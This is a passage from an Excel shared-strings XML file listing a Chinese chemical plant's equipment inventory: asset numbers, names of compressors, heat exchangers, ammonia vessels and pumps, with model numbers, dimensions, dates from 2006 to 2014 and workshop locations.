  </si>
  <si>
    <t>01010</t>
  </si>
  <si>
    <t>M180/314</t>
  </si>
  <si>
    <t>01015</t>
  </si>
  <si>
    <t>油分</t>
  </si>
  <si>
    <t>700</t>
  </si>
  <si>
    <t>2006.03.31</t>
  </si>
  <si>
    <t>01016</t>
  </si>
  <si>
    <t>6M25压缩机运费</t>
  </si>
  <si>
    <t>01022</t>
  </si>
  <si>
    <t>2006.03.30</t>
  </si>
  <si>
    <t>M306压缩岗位</t>
  </si>
  <si>
    <t>01031</t>
  </si>
  <si>
    <t>F148m2</t>
  </si>
  <si>
    <t>01054</t>
  </si>
  <si>
    <t>液态软启动装置</t>
  </si>
  <si>
    <t>01055</t>
  </si>
  <si>
    <t>01056</t>
  </si>
  <si>
    <t>01061</t>
  </si>
  <si>
    <t>液氨球罐</t>
  </si>
  <si>
    <t>650m3</t>
  </si>
  <si>
    <t>01063</t>
  </si>
  <si>
    <t>TRtl-1900</t>
  </si>
  <si>
    <t>01065</t>
  </si>
  <si>
    <t>01066</t>
  </si>
  <si>
    <t>TR8L-2140</t>
  </si>
  <si>
    <t>01067</t>
  </si>
  <si>
    <t>移动式高压清洗泵</t>
  </si>
  <si>
    <t>3ZH80</t>
  </si>
  <si>
    <t>01071</t>
  </si>
  <si>
    <t>φ500×2401</t>
  </si>
  <si>
    <t>01077</t>
  </si>
  <si>
    <t>热交换器</t>
  </si>
  <si>
    <t>DN700</t>
  </si>
  <si>
    <t>01078</t>
  </si>
  <si>
    <t>01092</t>
  </si>
  <si>
    <t>烃化塔内件</t>
  </si>
  <si>
    <t>φ800</t>
  </si>
  <si>
    <t>01093</t>
  </si>
  <si>
    <t>烃化分离器内件</t>
  </si>
  <si>
    <t>01098</t>
  </si>
  <si>
    <t>氨罐基础及材料</t>
  </si>
  <si>
    <t>650立方米</t>
  </si>
  <si>
    <t>2006.10.20</t>
  </si>
  <si>
    <t>01112</t>
  </si>
  <si>
    <t>台钻</t>
  </si>
  <si>
    <t>Z4120</t>
  </si>
  <si>
    <t>2006.12.01</t>
  </si>
  <si>
    <t>01113</t>
  </si>
  <si>
    <t>喷射器</t>
  </si>
  <si>
    <t>LZSH-300</t>
  </si>
  <si>
    <t>2006.12.10</t>
  </si>
  <si>
    <t>二脱再生塔</t>
  </si>
  <si>
    <t>01124</t>
  </si>
  <si>
    <t>TRZL-2140</t>
  </si>
  <si>
    <t>01125</t>
  </si>
  <si>
    <t>净化炉</t>
  </si>
  <si>
    <t>φ1600×6300</t>
  </si>
  <si>
    <t>01126</t>
  </si>
  <si>
    <t>01127</t>
  </si>
  <si>
    <t>01128</t>
  </si>
  <si>
    <t>三水加</t>
  </si>
  <si>
    <t>φ1000×5770</t>
  </si>
  <si>
    <t>01158</t>
  </si>
  <si>
    <t>驰放气氨回收装置</t>
  </si>
  <si>
    <t>AHS-1000G</t>
  </si>
  <si>
    <t>01178</t>
  </si>
  <si>
    <t>M-180/314氮氢压缩机</t>
  </si>
  <si>
    <t>01203</t>
  </si>
  <si>
    <t>除油器</t>
  </si>
  <si>
    <t>￠3500*28*7683</t>
  </si>
  <si>
    <t>01205</t>
  </si>
  <si>
    <t>水解炉</t>
  </si>
  <si>
    <t>￠2000*12*9410</t>
  </si>
  <si>
    <t>01206</t>
  </si>
  <si>
    <t>￠2400*14*9545</t>
  </si>
  <si>
    <t>01216</t>
  </si>
  <si>
    <t>静电除焦油器</t>
  </si>
  <si>
    <t>JC-Ⅱ</t>
  </si>
  <si>
    <t>01217</t>
  </si>
  <si>
    <t>JC-Ⅳ</t>
  </si>
  <si>
    <t>01241</t>
  </si>
  <si>
    <t>双吸泵</t>
  </si>
  <si>
    <t>YKK4004-4</t>
  </si>
  <si>
    <t>01242</t>
  </si>
  <si>
    <t>Y315L-4</t>
  </si>
  <si>
    <t>01258</t>
  </si>
  <si>
    <t>干燥器</t>
  </si>
  <si>
    <t>2007.08.31</t>
  </si>
  <si>
    <t>01265</t>
  </si>
  <si>
    <t>KQW80/170-7.5/2</t>
  </si>
  <si>
    <t>01301</t>
  </si>
  <si>
    <t>φ2000×20×6895</t>
  </si>
  <si>
    <t>01305</t>
  </si>
  <si>
    <t>5000脱硫塔填料</t>
  </si>
  <si>
    <t>φ5000</t>
  </si>
  <si>
    <t>01307</t>
  </si>
  <si>
    <t>PZW16-10/295-320</t>
  </si>
  <si>
    <t>01322</t>
  </si>
  <si>
    <t>升压泵</t>
  </si>
  <si>
    <t>GYB9C208</t>
  </si>
  <si>
    <t>01323</t>
  </si>
  <si>
    <t>液压拉伸器</t>
  </si>
  <si>
    <t>01325</t>
  </si>
  <si>
    <t>1600合成塔外壳</t>
  </si>
  <si>
    <t>件</t>
  </si>
  <si>
    <t>01327</t>
  </si>
  <si>
    <t>1200氨分离器外壳</t>
  </si>
  <si>
    <t>01328</t>
  </si>
  <si>
    <t>1200油分离器外壳</t>
  </si>
  <si>
    <t>01329</t>
  </si>
  <si>
    <t>1200冷交换器外壳</t>
  </si>
  <si>
    <t>01330</t>
  </si>
  <si>
    <t>1600卧式氨冷器</t>
  </si>
  <si>
    <t>φF-600m2</t>
  </si>
  <si>
    <t>01331</t>
  </si>
  <si>
    <t>1000热交换器外壳</t>
  </si>
  <si>
    <t>01332</t>
  </si>
  <si>
    <t>1400卧式水冷器</t>
  </si>
  <si>
    <t>01333</t>
  </si>
  <si>
    <t>合成废热锅炉</t>
  </si>
  <si>
    <t>φ2800×8160</t>
  </si>
  <si>
    <t>01334</t>
  </si>
  <si>
    <t>1000补气油分外壳</t>
  </si>
  <si>
    <t>01335</t>
  </si>
  <si>
    <t>1800立式氨冷凝器</t>
  </si>
  <si>
    <t>φ1800×8615</t>
  </si>
  <si>
    <t>01338</t>
  </si>
  <si>
    <t>KQW160-125</t>
  </si>
  <si>
    <t>01339</t>
  </si>
  <si>
    <t>二级分离器</t>
  </si>
  <si>
    <t>φ650×2980</t>
  </si>
  <si>
    <t>01340</t>
  </si>
  <si>
    <t>四级水冷器</t>
  </si>
  <si>
    <t>01341</t>
  </si>
  <si>
    <t>二级冷却器</t>
  </si>
  <si>
    <t>φ516×4923</t>
  </si>
  <si>
    <t>01342</t>
  </si>
  <si>
    <t>01343</t>
  </si>
  <si>
    <t>φ600×4025</t>
  </si>
  <si>
    <t>01345</t>
  </si>
  <si>
    <t>01346</t>
  </si>
  <si>
    <t>φ2500×6108</t>
  </si>
  <si>
    <t>01357</t>
  </si>
  <si>
    <t>M40冷却器</t>
  </si>
  <si>
    <t>F=108m2</t>
  </si>
  <si>
    <t>01358</t>
  </si>
  <si>
    <t>M180冷却器</t>
  </si>
  <si>
    <t>F=127m2</t>
  </si>
  <si>
    <t>01359</t>
  </si>
  <si>
    <t>M16冷却器</t>
  </si>
  <si>
    <t>F=52.4m2</t>
  </si>
  <si>
    <t>01360</t>
  </si>
  <si>
    <t>1级冷却器</t>
  </si>
  <si>
    <t>01361</t>
  </si>
  <si>
    <t>2级冷却器</t>
  </si>
  <si>
    <t>01362</t>
  </si>
  <si>
    <t>3.4级冷却器</t>
  </si>
  <si>
    <t>01363</t>
  </si>
  <si>
    <t>01364</t>
  </si>
  <si>
    <t>01365</t>
  </si>
  <si>
    <t>分离器</t>
  </si>
  <si>
    <t>φ500×3996</t>
  </si>
  <si>
    <t>01375</t>
  </si>
  <si>
    <t>测试仪</t>
  </si>
  <si>
    <t>2008.06.13</t>
  </si>
  <si>
    <t>01394</t>
  </si>
  <si>
    <t>冷却器六段</t>
  </si>
  <si>
    <t>01395</t>
  </si>
  <si>
    <t>冷却器五段</t>
  </si>
  <si>
    <t>φ83×11</t>
  </si>
  <si>
    <t>01398</t>
  </si>
  <si>
    <t>DN1600氨合成塔内件</t>
  </si>
  <si>
    <t>01399</t>
  </si>
  <si>
    <t>DN1000热交换器内件</t>
  </si>
  <si>
    <t>01400</t>
  </si>
  <si>
    <t>DN1200冷交换器内件</t>
  </si>
  <si>
    <t>01401</t>
  </si>
  <si>
    <t>DN1200氨分离器内件</t>
  </si>
  <si>
    <t>01402</t>
  </si>
  <si>
    <t>DN1200油分离器内件</t>
  </si>
  <si>
    <t>01403</t>
  </si>
  <si>
    <t>DN1000补气油分离器内件</t>
  </si>
  <si>
    <t>01425</t>
  </si>
  <si>
    <t>五级冷却器</t>
  </si>
  <si>
    <t>01426</t>
  </si>
  <si>
    <t>六级冷却器</t>
  </si>
  <si>
    <t>01427</t>
  </si>
  <si>
    <t>进口水分</t>
  </si>
  <si>
    <t>φ1800×3456</t>
  </si>
  <si>
    <t>01428</t>
  </si>
  <si>
    <t>氨螺杆冷冻机组</t>
  </si>
  <si>
    <t>JZKA-31.5</t>
  </si>
  <si>
    <t>01430</t>
  </si>
  <si>
    <t>01431</t>
  </si>
  <si>
    <t>氨液分离器</t>
  </si>
  <si>
    <t>01432</t>
  </si>
  <si>
    <t>辅助储氨器</t>
  </si>
  <si>
    <t>01435</t>
  </si>
  <si>
    <t>φ2500×6180</t>
  </si>
  <si>
    <t>01436</t>
  </si>
  <si>
    <t>丝网除油器</t>
  </si>
  <si>
    <t>φ2000</t>
  </si>
  <si>
    <t>01437</t>
  </si>
  <si>
    <t>φ2400×10716</t>
  </si>
  <si>
    <t>01438</t>
  </si>
  <si>
    <t>缓冲罐</t>
  </si>
  <si>
    <t>500*10*3000</t>
  </si>
  <si>
    <t>01439</t>
  </si>
  <si>
    <t>波纹管换热器</t>
  </si>
  <si>
    <t>01454</t>
  </si>
  <si>
    <t>IS80-65-200</t>
  </si>
  <si>
    <t>2008.07.26</t>
  </si>
  <si>
    <t>01469</t>
  </si>
  <si>
    <t>￠4300变换￠2200变换热水塔</t>
  </si>
  <si>
    <t>φ2200</t>
  </si>
  <si>
    <t>2008.10.27</t>
  </si>
  <si>
    <t>01472</t>
  </si>
  <si>
    <t>SL10B-56</t>
  </si>
  <si>
    <t>01474</t>
  </si>
  <si>
    <t>BAS6/450-U</t>
  </si>
  <si>
    <t>01484</t>
  </si>
  <si>
    <t>1.6米合成外网</t>
  </si>
  <si>
    <t>01489</t>
  </si>
  <si>
    <t>DN3200水分离器</t>
  </si>
  <si>
    <t>DN3200</t>
  </si>
  <si>
    <t>2009.02.26</t>
  </si>
  <si>
    <t>01490</t>
  </si>
  <si>
    <t>DN3600精脱硫槽</t>
  </si>
  <si>
    <t>DN3600</t>
  </si>
  <si>
    <t>01491</t>
  </si>
  <si>
    <t>再生槽</t>
  </si>
  <si>
    <t>φ6800/φ8300</t>
  </si>
  <si>
    <t>化工车间φ4.4变换</t>
  </si>
  <si>
    <t>01492</t>
  </si>
  <si>
    <t>01493</t>
  </si>
  <si>
    <t>三入分离器</t>
  </si>
  <si>
    <t>DN900</t>
  </si>
  <si>
    <t>01512</t>
  </si>
  <si>
    <t>2009.06.26</t>
  </si>
  <si>
    <t>01535</t>
  </si>
  <si>
    <t>DN4800变脱塔</t>
  </si>
  <si>
    <t>DN4800</t>
  </si>
  <si>
    <t>化工4.4米变换岗位</t>
  </si>
  <si>
    <t>01549</t>
  </si>
  <si>
    <t>精脱硫槽</t>
  </si>
  <si>
    <t>2010.02.23</t>
  </si>
  <si>
    <t>化工车间变换</t>
  </si>
  <si>
    <t>01550</t>
  </si>
  <si>
    <t>蒸汽分气缸</t>
  </si>
  <si>
    <t>01551</t>
  </si>
  <si>
    <t>脱盐水槽</t>
  </si>
  <si>
    <t>化工</t>
  </si>
  <si>
    <t>01562</t>
  </si>
  <si>
    <t>变换炉(筑炉)</t>
  </si>
  <si>
    <t>DN4400/DN4200</t>
  </si>
  <si>
    <t>2010.04.24</t>
  </si>
  <si>
    <t>01567</t>
  </si>
  <si>
    <t>SL25-56-03</t>
  </si>
  <si>
    <t>01569</t>
  </si>
  <si>
    <t>液力升压泵</t>
  </si>
  <si>
    <t>01576</t>
  </si>
  <si>
    <t>φ400×2584</t>
  </si>
  <si>
    <t>01578</t>
  </si>
  <si>
    <t>复合型蒸发式冷却器</t>
  </si>
  <si>
    <t>NZFL-2150</t>
  </si>
  <si>
    <t>冷却器加用料</t>
  </si>
  <si>
    <t>01579</t>
  </si>
  <si>
    <t>复合型蒸发式冷凝器</t>
  </si>
  <si>
    <t>FZKL-HA-5800</t>
  </si>
  <si>
    <t>冷凝器加用料</t>
  </si>
  <si>
    <t>01581</t>
  </si>
  <si>
    <t>KQSN300-M4/618</t>
  </si>
  <si>
    <t>DN4400变换</t>
  </si>
  <si>
    <t>01582</t>
  </si>
  <si>
    <t>双吸泵电机</t>
  </si>
  <si>
    <t>YKK450-4</t>
  </si>
  <si>
    <t>01583</t>
  </si>
  <si>
    <t>单级泵</t>
  </si>
  <si>
    <t>KQW100/200-22/2</t>
  </si>
  <si>
    <t>01584</t>
  </si>
  <si>
    <t>热水泵</t>
  </si>
  <si>
    <t>KQWR-C40/200-11/2</t>
  </si>
  <si>
    <t>01586</t>
  </si>
  <si>
    <t>摆线减速机</t>
  </si>
  <si>
    <t>XL859武进</t>
  </si>
  <si>
    <t>2010.06.26</t>
  </si>
  <si>
    <t>01591</t>
  </si>
  <si>
    <t>螺杆式启闭机</t>
  </si>
  <si>
    <t>手动2T</t>
  </si>
  <si>
    <t>2010.07.24</t>
  </si>
  <si>
    <t>直径4400变换</t>
  </si>
  <si>
    <t>01592</t>
  </si>
  <si>
    <t>6M50-306/314</t>
  </si>
  <si>
    <t>01598</t>
  </si>
  <si>
    <t>01602</t>
  </si>
  <si>
    <t>输入端总成</t>
  </si>
  <si>
    <t>LF47-400-09P+</t>
  </si>
  <si>
    <t>01603</t>
  </si>
  <si>
    <t>SG40-20-65</t>
  </si>
  <si>
    <t>01606</t>
  </si>
  <si>
    <t>五六段活塞总成</t>
  </si>
  <si>
    <t>4M16</t>
  </si>
  <si>
    <t>01614</t>
  </si>
  <si>
    <t>φ4400变换外网</t>
  </si>
  <si>
    <t>2010.10.26</t>
  </si>
  <si>
    <t>01616</t>
  </si>
  <si>
    <t>65UHB-ZK-A-15-50/11KW</t>
  </si>
  <si>
    <t>4.4变换岗位</t>
  </si>
  <si>
    <t>01620</t>
  </si>
  <si>
    <t>FZL-1300</t>
  </si>
  <si>
    <t>直径800西烃化</t>
  </si>
  <si>
    <t>01623</t>
  </si>
  <si>
    <t>槽盘式分布器</t>
  </si>
  <si>
    <t>直径4800</t>
  </si>
  <si>
    <t>DN4400变换岗位</t>
  </si>
  <si>
    <t>01625</t>
  </si>
  <si>
    <t>DN1500\900 F=100m3</t>
  </si>
  <si>
    <t>西DN800烃化岗位</t>
  </si>
  <si>
    <t>01631</t>
  </si>
  <si>
    <t>烃化蒸气加热器</t>
  </si>
  <si>
    <t>F=80m2 换热管为15CrMO W=15570kg</t>
  </si>
  <si>
    <t>化工西DN800</t>
  </si>
  <si>
    <t>01636</t>
  </si>
  <si>
    <t>逆流式冷却塔</t>
  </si>
  <si>
    <t>GNZF-1000</t>
  </si>
  <si>
    <t>化工车间空压站房北</t>
  </si>
  <si>
    <t>01638</t>
  </si>
  <si>
    <t>F=11.65m2</t>
  </si>
  <si>
    <t>化工车间M16岗位</t>
  </si>
  <si>
    <t>01639</t>
  </si>
  <si>
    <t>高性能中空纤维氮氢膜分离器</t>
  </si>
  <si>
    <t>直径100*3000mm</t>
  </si>
  <si>
    <t>根</t>
  </si>
  <si>
    <t>氢回收岗位</t>
  </si>
  <si>
    <t>01640</t>
  </si>
  <si>
    <t>φ4400变换水分</t>
  </si>
  <si>
    <t>φ3200*7300</t>
  </si>
  <si>
    <t>φ4400变换岗位</t>
  </si>
  <si>
    <t>01641</t>
  </si>
  <si>
    <t>化工氢回收岗位</t>
  </si>
  <si>
    <t>01642</t>
  </si>
  <si>
    <t>冰机蒸发冷却器</t>
  </si>
  <si>
    <t>NZFL-2600  方远</t>
  </si>
  <si>
    <t>化工车间冰机东、西框架各1台</t>
  </si>
  <si>
    <t>01654</t>
  </si>
  <si>
    <t>306压缩岗位</t>
  </si>
  <si>
    <t>01657</t>
  </si>
  <si>
    <t>80-32  混床</t>
  </si>
  <si>
    <t>2011.06.27</t>
  </si>
  <si>
    <t>01658</t>
  </si>
  <si>
    <t>调速电机</t>
  </si>
  <si>
    <t>3kw</t>
  </si>
  <si>
    <t>01663</t>
  </si>
  <si>
    <t>φ150*1500mm</t>
  </si>
  <si>
    <t>化工车间氢回收岗位 加技术服务费2万元转28号凭证</t>
  </si>
  <si>
    <t>01673</t>
  </si>
  <si>
    <t>FBZL-1300</t>
  </si>
  <si>
    <t>化工车间东烃化蒸发冷岗位</t>
  </si>
  <si>
    <t>01675</t>
  </si>
  <si>
    <t>氨螺杆压缩机组(冰机)</t>
  </si>
  <si>
    <t>JZVLG324T</t>
  </si>
  <si>
    <t>化工车间冷冻岗位</t>
  </si>
  <si>
    <t>01683</t>
  </si>
  <si>
    <t>一入洗气塔</t>
  </si>
  <si>
    <t>φ4500*17000</t>
  </si>
  <si>
    <t>2011.07.27</t>
  </si>
  <si>
    <t>化工车间压缩岗位40一入 800甲醇岗位</t>
  </si>
  <si>
    <t>01685</t>
  </si>
  <si>
    <t>甲醇分离器内件</t>
  </si>
  <si>
    <t>化工车间精炼岗位</t>
  </si>
  <si>
    <t>01686</t>
  </si>
  <si>
    <t>冷管束</t>
  </si>
  <si>
    <t>DN1200</t>
  </si>
  <si>
    <t>2011.09.23</t>
  </si>
  <si>
    <t>化工车间1200合成塔内</t>
  </si>
  <si>
    <t>01689</t>
  </si>
  <si>
    <t>3DP40</t>
  </si>
  <si>
    <t>2011.09.26</t>
  </si>
  <si>
    <t>01690</t>
  </si>
  <si>
    <t>KQWH100-200</t>
  </si>
  <si>
    <t>2011.10.26</t>
  </si>
  <si>
    <t>化工车间φ4400变换岗位</t>
  </si>
  <si>
    <t>01691</t>
  </si>
  <si>
    <t>TDFK-900KVA</t>
  </si>
  <si>
    <t>化工车间西烃化</t>
  </si>
  <si>
    <t>01692</t>
  </si>
  <si>
    <t>1000Nm3/h</t>
  </si>
  <si>
    <t>化工车间氨回收岗位</t>
  </si>
  <si>
    <t>01696</t>
  </si>
  <si>
    <t>2011.12.07</t>
  </si>
  <si>
    <t>化工车间变换岗位</t>
  </si>
  <si>
    <t>01720</t>
  </si>
  <si>
    <t>φ4400变换设备</t>
  </si>
  <si>
    <t>化工车间4400变换岗位</t>
  </si>
  <si>
    <t>01721</t>
  </si>
  <si>
    <t>净化器</t>
  </si>
  <si>
    <t>680m2</t>
  </si>
  <si>
    <t>01723</t>
  </si>
  <si>
    <t>大冰机基础</t>
  </si>
  <si>
    <t>765.44立方米</t>
  </si>
  <si>
    <t>化工车间冰机岗位</t>
  </si>
  <si>
    <t>01729</t>
  </si>
  <si>
    <t>M306压缩机外网</t>
  </si>
  <si>
    <t>2011.12.29</t>
  </si>
  <si>
    <t>化工车间M306压缩岗位</t>
  </si>
  <si>
    <t>01744</t>
  </si>
  <si>
    <t>KQL125/90-7.5/2</t>
  </si>
  <si>
    <t>2012.03.22</t>
  </si>
  <si>
    <t>化工车间烃化蒸发冷岗位</t>
  </si>
  <si>
    <t>01747</t>
  </si>
  <si>
    <t>氨气循环压缩机</t>
  </si>
  <si>
    <t>ZW-1.5/16-24</t>
  </si>
  <si>
    <t>01884</t>
  </si>
  <si>
    <t>第一喷水汽化器</t>
  </si>
  <si>
    <t>2012.05.24</t>
  </si>
  <si>
    <t>化工车间DN4400变换岗位</t>
  </si>
  <si>
    <t>01901</t>
  </si>
  <si>
    <t>01902</t>
  </si>
  <si>
    <t>01903</t>
  </si>
  <si>
    <t>动力箱</t>
  </si>
  <si>
    <t>01904</t>
  </si>
  <si>
    <t>JXF</t>
  </si>
  <si>
    <t>01905</t>
  </si>
  <si>
    <t>化工车间大冰机岗位</t>
  </si>
  <si>
    <t>01906</t>
  </si>
  <si>
    <t>01907</t>
  </si>
  <si>
    <t>氨分器</t>
  </si>
  <si>
    <t>AF-350B</t>
  </si>
  <si>
    <t>01910</t>
  </si>
  <si>
    <t>FZL-6500</t>
  </si>
  <si>
    <t>2012.05.23</t>
  </si>
  <si>
    <t>化工车间DN1200合成岗位</t>
  </si>
  <si>
    <t>01913</t>
  </si>
  <si>
    <t>01917</t>
  </si>
  <si>
    <t>4M40(50)曲轴</t>
  </si>
  <si>
    <t>02-01</t>
  </si>
  <si>
    <t>01934</t>
  </si>
  <si>
    <t>DN/50液氨装卸臂</t>
  </si>
  <si>
    <t>DN/50</t>
  </si>
  <si>
    <t>化工岗位</t>
  </si>
  <si>
    <t>01947</t>
  </si>
  <si>
    <t>KYN28</t>
  </si>
  <si>
    <t>2012.10.25</t>
  </si>
  <si>
    <t>化工车间306压缩岗位</t>
  </si>
  <si>
    <t>01948</t>
  </si>
  <si>
    <t>防爆声光报警器</t>
  </si>
  <si>
    <t>SGBJ</t>
  </si>
  <si>
    <t>2012.11.25</t>
  </si>
  <si>
    <t>化工车间    王永军</t>
  </si>
  <si>
    <t>01950</t>
  </si>
  <si>
    <t>YBF160L-8</t>
  </si>
  <si>
    <t>2012.12.14</t>
  </si>
  <si>
    <t>01956</t>
  </si>
  <si>
    <t>煤炼基础</t>
  </si>
  <si>
    <t>2013.01.31</t>
  </si>
  <si>
    <t>01970</t>
  </si>
  <si>
    <t>中温水解炉</t>
  </si>
  <si>
    <t>DN3400</t>
  </si>
  <si>
    <t>2013.06.30</t>
  </si>
  <si>
    <t>化工车间Φ4400变换岗位</t>
  </si>
  <si>
    <t>01971</t>
  </si>
  <si>
    <t>油分离器内件</t>
  </si>
  <si>
    <t>化工车间1200合成岗位</t>
  </si>
  <si>
    <t>01979</t>
  </si>
  <si>
    <t>BH Ⅱ型</t>
  </si>
  <si>
    <t>化工车间合成氨回收岗位</t>
  </si>
  <si>
    <t>01996</t>
  </si>
  <si>
    <t>紧急器材柜</t>
  </si>
  <si>
    <t>氨库岗位</t>
  </si>
  <si>
    <t>01997</t>
  </si>
  <si>
    <t>洗眼器</t>
  </si>
  <si>
    <t>BTL11</t>
  </si>
  <si>
    <t>02018</t>
  </si>
  <si>
    <t>COD在线分析仪</t>
  </si>
  <si>
    <t>HBCOD-1</t>
  </si>
  <si>
    <t>2013.12.25</t>
  </si>
  <si>
    <t>化工车间污水岗位</t>
  </si>
  <si>
    <t>02022</t>
  </si>
  <si>
    <t>三级出口缓冲器</t>
  </si>
  <si>
    <t>φ950*3000</t>
  </si>
  <si>
    <t>02023</t>
  </si>
  <si>
    <t>02027</t>
  </si>
  <si>
    <t>超声波明渠流量计</t>
  </si>
  <si>
    <t>HBML-3</t>
  </si>
  <si>
    <t>2014.03.25</t>
  </si>
  <si>
    <t>化工车间  终端岗位</t>
  </si>
  <si>
    <t>02030</t>
  </si>
  <si>
    <t>立式多级离心泵</t>
  </si>
  <si>
    <t>2014.04.25</t>
  </si>
  <si>
    <t>尿素车间  脱盐水岗位</t>
  </si>
  <si>
    <t>02031</t>
  </si>
  <si>
    <t>脱烃净化塔</t>
  </si>
  <si>
    <t>φ600*8448</t>
  </si>
  <si>
    <t>化工车间   终端岗位</t>
  </si>
  <si>
    <t>02032</t>
  </si>
  <si>
    <t>可拆式换热器30平方</t>
  </si>
  <si>
    <t>BRO.3</t>
  </si>
  <si>
    <t>化工车间  甲醇岗位</t>
  </si>
  <si>
    <t>02036</t>
  </si>
  <si>
    <t>废水深度处理</t>
  </si>
  <si>
    <t>化工车间    终端岗位</t>
  </si>
  <si>
    <t>02038</t>
  </si>
  <si>
    <t>φ2200*25807</t>
  </si>
  <si>
    <t>2014.07.25</t>
  </si>
  <si>
    <t>化工车间3400变换岗位</t>
  </si>
  <si>
    <t>02039</t>
  </si>
  <si>
    <t>BOM1000-0.8-257-6/25-1J</t>
  </si>
  <si>
    <t>02041</t>
  </si>
  <si>
    <t>板式换热器(316L)</t>
  </si>
  <si>
    <t>BRO.5-50</t>
  </si>
  <si>
    <t>02042</t>
  </si>
  <si>
    <t>BRO.23-20 （1600氨合成）</t>
  </si>
  <si>
    <t>02049</t>
  </si>
  <si>
    <t>氨气报警器</t>
  </si>
  <si>
    <t>SNK6000</t>
  </si>
  <si>
    <t>2014.09.25</t>
  </si>
  <si>
    <t>化工车间液氨灌区</t>
  </si>
  <si>
    <t>02050</t>
  </si>
  <si>
    <t>BR0.5-50</t>
  </si>
  <si>
    <t>化工车间东306压缩岗位</t>
  </si>
  <si>
    <t>02061</t>
  </si>
  <si>
    <t>小型气象站</t>
  </si>
  <si>
    <t>PC-510</t>
  </si>
  <si>
    <t>罐区岗位</t>
  </si>
  <si>
    <t>02070</t>
  </si>
  <si>
    <t>水处理药剂槽</t>
  </si>
  <si>
    <t>终端岗位</t>
  </si>
  <si>
    <t>3.8米变换</t>
  </si>
  <si>
    <t>HPR1.3-1.2.150m2</t>
  </si>
  <si>
    <t>电加热罐</t>
  </si>
  <si>
    <t>Φ800*10*6300</t>
  </si>
  <si>
    <t>气包</t>
  </si>
  <si>
    <t>Φ1400*12*4587</t>
  </si>
  <si>
    <t>热水塔</t>
  </si>
  <si>
    <t>Φ1400*12</t>
  </si>
  <si>
    <t>360m2</t>
  </si>
  <si>
    <t>Φ1800*3000</t>
  </si>
  <si>
    <t>Φ1000*3400</t>
  </si>
  <si>
    <t>2.8米变换</t>
  </si>
  <si>
    <t>增湿器</t>
  </si>
  <si>
    <t>1200*5000</t>
  </si>
  <si>
    <t>机油槽</t>
  </si>
  <si>
    <t>1.6*2*1.5</t>
  </si>
  <si>
    <t>600*2500</t>
  </si>
  <si>
    <t>100R-37</t>
  </si>
  <si>
    <t>多板泵</t>
  </si>
  <si>
    <t>电加垫</t>
  </si>
  <si>
    <t>Φ900*7000</t>
  </si>
  <si>
    <t>水罐</t>
  </si>
  <si>
    <t>Φ2000*5500</t>
  </si>
  <si>
    <t>集水罐</t>
  </si>
  <si>
    <t>Φ1000*2500</t>
  </si>
  <si>
    <t>回收泵</t>
  </si>
  <si>
    <t>50-100A</t>
  </si>
  <si>
    <t>4.4米变换</t>
  </si>
  <si>
    <t>Φ377mm  h=1m</t>
  </si>
  <si>
    <t>砂滤器</t>
  </si>
  <si>
    <t>Φ3.8*4</t>
  </si>
  <si>
    <t>水分</t>
  </si>
  <si>
    <t>Φ1500*2200</t>
  </si>
  <si>
    <t>铁管井</t>
  </si>
  <si>
    <t>280米</t>
  </si>
  <si>
    <t>立式一次水泵</t>
  </si>
  <si>
    <t>IRG80-125</t>
  </si>
  <si>
    <t>气缸泵</t>
  </si>
  <si>
    <t>TQR80-160IA</t>
  </si>
  <si>
    <t>地沟泵</t>
  </si>
  <si>
    <t>KQW80-110-7.5/2</t>
  </si>
  <si>
    <t>1.6m*2500</t>
  </si>
  <si>
    <t>空气缓冲罐</t>
  </si>
  <si>
    <t>800*1500</t>
  </si>
  <si>
    <t>空压站</t>
  </si>
  <si>
    <t>冷凝器</t>
  </si>
  <si>
    <t>Φ500*2000</t>
  </si>
  <si>
    <t>37KW</t>
  </si>
  <si>
    <t>备件</t>
  </si>
  <si>
    <t>700*1800</t>
  </si>
  <si>
    <t>小水分</t>
  </si>
  <si>
    <t>400*1500</t>
  </si>
  <si>
    <t>单级双吸泵</t>
  </si>
  <si>
    <t>KQSN350-N13/406</t>
  </si>
  <si>
    <t>晾水塔</t>
  </si>
  <si>
    <t>200m2</t>
  </si>
  <si>
    <t>冰机工段移动</t>
  </si>
  <si>
    <t>IH80-50-250</t>
  </si>
  <si>
    <t>150m2</t>
  </si>
  <si>
    <t>铜渡缓冲罐</t>
  </si>
  <si>
    <t>Φ1000*1500</t>
  </si>
  <si>
    <t>立式换热器</t>
  </si>
  <si>
    <t>Φ1000*4000</t>
  </si>
  <si>
    <t>Φ2000*2500</t>
  </si>
  <si>
    <t>25FBL41</t>
  </si>
  <si>
    <t>烃化</t>
  </si>
  <si>
    <t>旧上加热</t>
  </si>
  <si>
    <t>旧铜塔</t>
  </si>
  <si>
    <t>Φ700*14000</t>
  </si>
  <si>
    <t>旧铜分</t>
  </si>
  <si>
    <t>Φ500*6000</t>
  </si>
  <si>
    <t>蒸汽分离器</t>
  </si>
  <si>
    <t>Φ700*2000</t>
  </si>
  <si>
    <t>旧上下加热</t>
  </si>
  <si>
    <t>Φ1200*10000</t>
  </si>
  <si>
    <t>往复泵</t>
  </si>
  <si>
    <t>Φ1000*5000</t>
  </si>
  <si>
    <t>卧式再生器</t>
  </si>
  <si>
    <t>Φ2800*12000</t>
  </si>
  <si>
    <t>回流塔</t>
  </si>
  <si>
    <t>Φ1200*8000</t>
  </si>
  <si>
    <t>氨水冷排</t>
  </si>
  <si>
    <t>64*4.5m</t>
  </si>
  <si>
    <t>下加热</t>
  </si>
  <si>
    <t>Φ1200*7000</t>
  </si>
  <si>
    <t>Φ1400*4000</t>
  </si>
  <si>
    <t>集油槽</t>
  </si>
  <si>
    <t>上加热</t>
  </si>
  <si>
    <t>Φ1000*6000</t>
  </si>
  <si>
    <t>氨水罐</t>
  </si>
  <si>
    <t>Φ3000*5000</t>
  </si>
  <si>
    <t>冷冻工段</t>
  </si>
  <si>
    <t>蒸发冷</t>
  </si>
  <si>
    <t>TR2L2140</t>
  </si>
  <si>
    <t>Φ500*1000</t>
  </si>
  <si>
    <t>2500*10*3000</t>
  </si>
  <si>
    <t>装车管线配套</t>
  </si>
  <si>
    <t>条</t>
  </si>
  <si>
    <t>进口氨分离器</t>
  </si>
  <si>
    <t>1000*2500</t>
  </si>
  <si>
    <t>出口油分</t>
  </si>
  <si>
    <t>LYF-250   1400*2500</t>
  </si>
  <si>
    <t>螺杆氨压缩机</t>
  </si>
  <si>
    <t>KA31.5-1</t>
  </si>
  <si>
    <t>吸油泵</t>
  </si>
  <si>
    <t>Φ700*6500</t>
  </si>
  <si>
    <t>水口分离器</t>
  </si>
  <si>
    <t>Φ600*2000</t>
  </si>
  <si>
